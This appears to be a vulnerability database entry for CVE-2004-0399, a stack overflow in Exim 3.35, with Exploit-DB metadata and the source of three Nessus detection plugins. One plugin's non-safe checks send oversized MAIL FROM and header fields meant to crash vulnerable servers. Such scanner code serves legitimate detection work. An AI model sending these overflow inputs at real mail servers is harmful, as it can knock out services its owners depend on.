Vulnerabilities > CVE-2004-0399 - Unspecified vulnerability in University of Cambridge Exim 3.35
Attack vector
UNKNOWN Attack complexity
UNKNOWN Privileges required
UNKNOWN Confidentiality impact
UNKNOWN Integrity impact
UNKNOWN Availability impact
UNKNOWN Summary
Stack-based buffer overflow in Exim 3.35, and other versions before 4, when the sender_verify option is true, allows remote attackers to cause a denial of service and possibly execute arbitrary code during sender verification.
Vulnerable Configurations
| Part | Description | Count |
|---|---|---|
| Application | 2 |
Exploit-Db
| description | Exim Sender 3.35 Verification Remote Stack Buffer Overrun Vulnerability. CVE-2004-0399. Remote exploit for linux platform |
| id | EDB-ID:24093 |
| last seen | 2016-02-02 |
| modified | 2004-05-06 |
| published | 2004-05-06 |
| reporter | newroot |
| source | https://www.exploit-db.com/download/24093/ |
| title | Exim Sender 3.35 Verification Remote Stack Buffer Overrun Vulnerability |
Nessus
NASL family SMTP problems NASL id EXIM_MULT_OVERFLOW.NASL description The remote version of Exim has multiple remote stack-based buffer overflow vulnerabilities when header syntax checking is enabled. It should be noted that this is not the default configuration. A remote attacker could exploit this to execute arbitrary code. last seen 2020-06-01 modified 2020-06-02 plugin id 12232 published 2004-05-06 reporter This script is Copyright (C) 2004-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/12232 title Exim < 3.36 / 4.33 Multiple Remote Overflows code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(12232); script_version("1.23"); script_cvs_date("Date: 2018/11/15 20:50:24"); script_cve_id("CVE-2004-0399", "CVE-2004-0400"); script_xref(name:"Secunia", value:"11558"); script_name(english:"Exim < 3.36 / 4.33 Multiple Remote Overflows"); script_summary(english:"Exim Multiple Overflows"); script_set_attribute(attribute:"synopsis", value:"The remote SMTP server has multiple buffer overflow vulnerabilities."); script_set_attribute(attribute:"description", value: "The remote version of Exim has multiple remote stack-based buffer overflow vulnerabilities when header syntax checking is enabled. It should be noted that this is not the default configuration. A remote attacker could exploit this to execute arbitrary code."); script_set_attribute(attribute:"see_also", value:"https://seclists.org/fulldisclosure/2004/May/270"); script_set_attribute(attribute:"solution", value: "Upgrade to Exim 4.32 or later, or disable header syntax checking in exim.conf."); script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P"); script_set_attribute(attribute:"vuln_publication_date", value:"2004/05/06"); script_set_attribute(attribute:"plugin_publication_date", value:"2004/05/06"); script_set_attribute(attribute:"potential_vulnerability", value:"true"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:exim:exim"); script_end_attributes(); script_category(ACT_MIXED_ATTACK); script_family(english:"SMTP problems"); script_copyright(english:"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc."); script_dependencie("smtpserver_detect.nasl"); # should we use the result from smtpscan? script_require_keys("Settings/ParanoidReport"); script_require_ports("Services/smtp", 25); exit(0); } include("audit.inc"); include("global_settings.inc"); include("smtp_func.inc"); if (report_paranoia < 2) audit(AUDIT_PARANOID); port = get_kb_item("Services/smtp"); if(!port) port = 25; if (! get_port_state(port)) exit(0); banner = get_smtp_banner(port:port); if(!banner)exit(0); if (! egrep(string:banner, pattern:"Exim") ) exit(0); if (safe_checks()) { if(egrep(pattern:"220.*Exim ([0-2]\.|3\.([0-2][0-9]|3[0-5])|4\.([0-2][0-9]|3[0-2]))", string:banner)) { report = string("\nNessus verified this solely by checking the banner.\n"); security_warning(port); } exit(0); } else { soc = open_sock_tcp(port); if (!soc) exit(0); banner = smtp_recv_line(socket:soc); if ( ! banner ) exit(0); req = string("HELO x.x.x.x\r\n"); req += string("MAIL FROM: ", crap(300), "@nessus.org\r\n\r\n"); req += string("RCPT TO: web@localhost\r\n"); req += string("DATA\r\n"); req += string("blahblah\r\n.\r\nQUIT\r\n"); send(socket:soc, data:req); r = recv_line(socket:soc, length:512); if (!r) { security_warning(port); exit(0); } close(soc); # non-safe check # 2 req = string("HELO x.x.x.x\r\n"); req += string("MAIL FROM: [email protected]\r\n"); req += string("RCPT TO: web@localhost\r\n"); req += string("DATA\r\n"); req += string("From", crap(data:" ", length:275), ":nessus\r\n"); req += string("blahblah\r\n.\r\nQUIT\r\n"); soc = open_sock_tcp(port); if (!soc) { security_warning(port); exit(0); } banner = smtp_recv_line(socket:soc); if ( ! banner ) exit(0); send(socket:soc, data:req); r = recv_line(socket:soc, length:512); if (!r) { security_warning(port); exit(0); } close (soc); # non-safe check # 3 req = string("HELO x.x.x.x\r\n"); req += string("MAIL FROM: [email protected]\r\n"); req += string("RCPT TO: web@localhost\r\n"); req += string("DATA\r\n"); req += string("From", crap(data:" ", length:275), ":nessus\r\n"); req += string("blahblah\r\n.\r\nQUIT\r\n"); soc = open_sock_tcp(port); if (!soc) { security_warning(port); exit(0); } banner = smtp_recv_line(socket:soc); if ( ! banner ) exit(0); send(socket:soc, data:req); r = recv_line(socket:soc, length:512); if (!r) { security_warning(port); exit(0); } close (soc); exit(0); }NASL family Debian Local Security Checks NASL id DEBIAN_DSA-502.NASL description Georgi Guninski discovered two stack-based buffer overflows in exim and exim-tls. They cannot be exploited with the default configuration from the Debian system, though. The Common Vulnerabilities and Exposures project identifies the following problems that are fixed with this update : - CAN-2004-0399 When last seen 2020-06-01 modified 2020-06-02 plugin id 15339 published 2004-09-29 reporter This script is Copyright (C) 2004-2019 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/15339 title Debian DSA-502-1 : exim-tls - buffer overflow code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Debian Security Advisory DSA-502. The text # itself is copyright (C) Software in the Public Interest, Inc. # include("compat.inc"); if (description) { script_id(15339); script_version("1.19"); script_cvs_date("Date: 2019/08/02 13:32:18"); script_cve_id("CVE-2004-0399", "CVE-2004-0400"); script_bugtraq_id(10290, 10291); script_xref(name:"DSA", value:"502"); script_name(english:"Debian DSA-502-1 : exim-tls - buffer overflow"); script_summary(english:"Checks dpkg output for the updated package"); script_set_attribute( attribute:"synopsis", value:"The remote Debian host is missing a security-related update." ); script_set_attribute( attribute:"description", value: "Georgi Guninski discovered two stack-based buffer overflows in exim and exim-tls. They cannot be exploited with the default configuration from the Debian system, though. The Common Vulnerabilities and Exposures project identifies the following problems that are fixed with this update : - CAN-2004-0399 When 'sender_verify = true' is configured in exim.conf a buffer overflow can happen during verification of the sender. This problem is fixed in exim 4. - CAN-2004-0400 When headers_check_syntax is configured in exim.conf a buffer overflow can happen during the header check. This problem does also exist in exim 4." ); script_set_attribute( attribute:"see_also", value:"http://www.debian.org/security/2004/dsa-502" ); script_set_attribute( attribute:"solution", value: "Upgrade the exim-tls package. For the stable distribution (woody) these problems have been fixed in version 3.35-3woody2." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:ND"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:exim-tls"); script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:3.0"); script_set_attribute(attribute:"patch_publication_date", value:"2004/05/11"); script_set_attribute(attribute:"plugin_publication_date", value:"2004/09/29"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2004-2019 Tenable Network Security, Inc."); script_family(english:"Debian Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l"); exit(0); } include("audit.inc"); include("debian_package.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); if (!get_kb_item("Host/Debian/release")) audit(AUDIT_OS_NOT, "Debian"); if (!get_kb_item("Host/Debian/dpkg-l")) audit(AUDIT_PACKAGE_LIST_MISSING); flag = 0; if (deb_check(release:"3.0", prefix:"exim-tls", reference:"3.35-3woody2")) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get()); else security_hole(0); exit(0); } else audit(AUDIT_HOST_NOT, "affected");NASL family Debian Local Security Checks NASL id DEBIAN_DSA-501.NASL description Georgi Guninski discovered two stack-based buffer overflows. They can not be exploited with the default configuration from the Debian system, though. The Common Vulnerabilities and Exposures project identifies the following problems that are fixed with this update : - CAN-2004-0399 When last seen 2020-06-01 modified 2020-06-02 plugin id 15338 published 2004-09-29 reporter This script is Copyright (C) 2004-2019 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/15338 title Debian DSA-501-1 : exim - buffer overflow code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Debian Security Advisory DSA-501. The text # itself is copyright (C) Software in the Public Interest, Inc. # include("compat.inc"); if (description) { script_id(15338); script_version("1.23"); script_cvs_date("Date: 2019/08/02 13:32:18"); script_cve_id("CVE-2004-0399", "CVE-2004-0400"); script_bugtraq_id(10290, 10291); script_xref(name:"DSA", value:"501"); script_name(english:"Debian DSA-501-1 : exim - buffer overflow"); script_summary(english:"Checks dpkg output for the updated package"); script_set_attribute( attribute:"synopsis", value:"The remote Debian host is missing a security-related update." ); script_set_attribute( attribute:"description", value: "Georgi Guninski discovered two stack-based buffer overflows. They can not be exploited with the default configuration from the Debian system, though. The Common Vulnerabilities and Exposures project identifies the following problems that are fixed with this update : - CAN-2004-0399 When 'sender_verify = true' is configured in exim.conf a buffer overflow can happen during verification of the sender. This problem is fixed in exim 4. - CAN-2004-0400 When headers_check_syntax is configured in exim.conf a buffer overflow can happen during the header check. This problem does also exist in exim 4." ); script_set_attribute( attribute:"see_also", value:"http://www.debian.org/security/2004/dsa-501" ); script_set_attribute( attribute:"solution", value: "Upgrade the exim package. For the stable distribution (woody) these problems have been fixed in version 3.35-1woody3." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:exim"); script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:3.0"); script_set_attribute(attribute:"patch_publication_date", value:"2004/05/07"); script_set_attribute(attribute:"plugin_publication_date", value:"2004/09/29"); script_set_attribute(attribute:"vuln_publication_date", value:"2004/05/06"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2004-2019 Tenable Network Security, Inc."); script_family(english:"Debian Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l"); exit(0); } include("audit.inc"); include("debian_package.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); if (!get_kb_item("Host/Debian/release")) audit(AUDIT_OS_NOT, "Debian"); if (!get_kb_item("Host/Debian/dpkg-l")) audit(AUDIT_PACKAGE_LIST_MISSING); flag = 0; if (deb_check(release:"3.0", prefix:"exim", reference:"3.35-1woody3")) flag++; if (deb_check(release:"3.0", prefix:"eximon", reference:"3.35-1woody3")) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get()); else security_hole(0); exit(0); } else audit(AUDIT_HOST_NOT, "affected");
References
- http://lists.grok.org.uk/pipermail/full-disclosure/2004-May/021015.html
- http://lists.grok.org.uk/pipermail/full-disclosure/2004-May/021015.html
- http://secunia.com/advisories/11558
- http://secunia.com/advisories/11558
- http://www.debian.org/security/2004/dsa-501
- http://www.debian.org/security/2004/dsa-501
- http://www.debian.org/security/2004/dsa-502
- http://www.debian.org/security/2004/dsa-502
- http://www.guninski.com/exim1.html
- http://www.guninski.com/exim1.html
- https://exchange.xforce.ibmcloud.com/vulnerabilities/16079
- https://exchange.xforce.ibmcloud.com/vulnerabilities/16079